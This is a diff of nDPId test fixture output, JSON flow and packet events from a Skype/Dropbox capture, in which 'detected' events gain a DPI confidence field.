+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656652,"flow_last_seen":1431969656652,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969656652,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01114{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1431969657029,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"ts_msec":1431969657029,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISvf0AAEAR+NnAqAFc\/\/\/\/\/0RcRFwB\/v9VeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":542,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01110{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1431969657029,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"ts_msec":1431969657029,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISJhIAAEARzh3AqAFcwKgB\/0RcRFwB\/jyueyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="}
-00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGANAAEAGj4bAqAEinTg0LMNwnGCx3l8+AAAAALAC\/\/8vJgAAAgQFtAEDAwUBAQgKPiLFlwAAAAAEAgAA"}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50033,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -195,19 +195,19 @@
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwhRAAEAGlxXAqAEinTeCjMNynGH\/hzWiAAAAALAC\/\/+8tgAAAgQFtAEDAwUBAQgKPiLFlwAAAAAEAgAA"}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/NlsAAEARxRrAqAEib91NkTLdnFsAK6mBm7oCyq7Iy7cmxwvThWDRoZOMl0+28C1BuPbRnMjSw2j4JUc="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":547,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAAA27UQAAEARdBjAqAEiQAQXjDLdnEwAIlR2m7wC9vRcAIihDfXYF+Nv6Z8h\/1gxupEorwc="}
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":548,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4fm8AAEAR4uHAqAEiQAQXljLdnEQAJKG2m74ChlnucS6od9D4320Ts5x3xY96lsRHLX7REg=="}
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":549,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1431969657368,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969657368,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0lqwAAEARaEzAqAEib91KGTLdnFwAIDPbm8ACFZDv7jAw6LF020D2sIW\/RLlBE6QH"}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":550,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.153","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":550,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1431969657368,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1431969657368,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5GS4AAEAR4kXAqAEib91NmTLdnFgAJQIPm8ICkS16B313b791pcC\/iQ60uf4KWNmYdYf5eCQ="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.153","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.153","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1431969657498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969657498,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYi6dN4KMwKgBIpxhw3JnDsNv\/4c1o6ASOJAm+AAAAgQFrAQCCApOvfTqPiLFlwEDAwk="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1431969657498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969657498,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0z75AAEAGiXfAqAEinTeCjMNynGH\/hzWjZw7DcIAQECx9oAAAAQEICj4ixhlOvfTq"}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1431969657511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969657511,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBCdNziqwKgBIpxPw3E+7utRq+gShaASOJAwmQAAAgQFrAQCCApNea1+PiLFlwEDAwk="}
@@ -218,19 +218,19 @@
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQSRAAEAGrlLAqAEi1cezr8NznFXnJeTHAAAAALAC\/\/+4YAAAAgQFtAEDAwUBAQgKPiLJgQAAAAAEAgAA"}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":581,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0QmIAAEARVi\/AqAEiQTffJjLdnE8AIJ1Im8QCCqRVDPPz90033q\/EDoSNqvvC54ua"}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":581,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":581,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":582,"source":"skype.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
